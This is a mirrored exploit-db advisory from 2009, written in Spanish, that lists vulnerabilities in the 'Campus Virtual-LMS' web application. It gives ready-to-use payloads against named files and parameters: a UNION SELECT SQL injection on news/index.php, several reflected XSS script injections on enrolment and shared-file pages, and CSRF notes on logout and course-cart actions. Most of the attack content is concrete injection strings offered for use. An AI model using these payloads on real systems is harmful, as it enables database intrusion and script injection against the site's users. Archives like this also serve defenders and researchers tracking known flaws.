bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/platforms/php/webapps/8937.txt
Offensive Security cc553d1147 DB: 2015-04-20 
11 new exploits
2015-04-20 12:44:13 +00:00

51 lines
2.1 KiB
Text
Executable file
Raw Blame History

This file contains invisible Unicode characters

This file contains invisible Unicode characters that are indistinguishable to humans but may be processed differently by a computer. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

+-----------------------------------------------------------------------------+
LMS: Campus Virtual-LMS
WEB: http://campusvirtualcomputrade.cae.net
Autor: Yasión
Fecha: 12 jun 2009
+-----------------------------------------------------------------------------+
-----------------------------------------------------------------------------+
[+] SQLi
-----------------------------------------------------------------------------+
Archivo: news/index.php [no logged]
GET: ?id
Inyección: -1 union select 1,2,3,4,5,6,7
-----------------------------------------------------------------------------+
-----------------------------------------------------------------------------+
[+] XSS
-----------------------------------------------------------------------------+
Archivo: enrolments/step1.php [no logged]
GET: ?courseid
Inyección: 1"><script>alert(/xD/.source)</script>
Archivo: files/shared_list.php [logged]
GET/POST: ?search
Inyección: "><script>alert(/xD/.source)</script><!--
Archivo: files/shared_list.php [logged]
GET: ?siteid
Inyección: "><script>alert(/xD/.source)</script><!--
-----------------------------------------------------------------------------+
-----------------------------------------------------------------------------+
[+] CSRF
-----------------------------------------------------------------------------+
Archivo: login/logout.php
Info: Desconecta al usuario mediante una imagen, un redireccionamiento, un
link...
Archivo: enrolments/step2.php
GET: ?action=[ACTION]&orderid=[ORDERID]&courseid=[COURSEID]
Info: Añade o elimina [ADD/DELETE] el curso identificado por COURSEID a la
cesta identificada por ODERID. Sería necesario conocer por adelantado la
cesta del usuario. (No explotable)
-----------------------------------------------------------------------------+
+-----------------------------------------------------------------------------+
Gretz: UnderSecurity.net
+-----------------------------------------------------------------------------+
# milw0rm.com [2009-06-12]
Reference in a new issue View git blame Copy permalink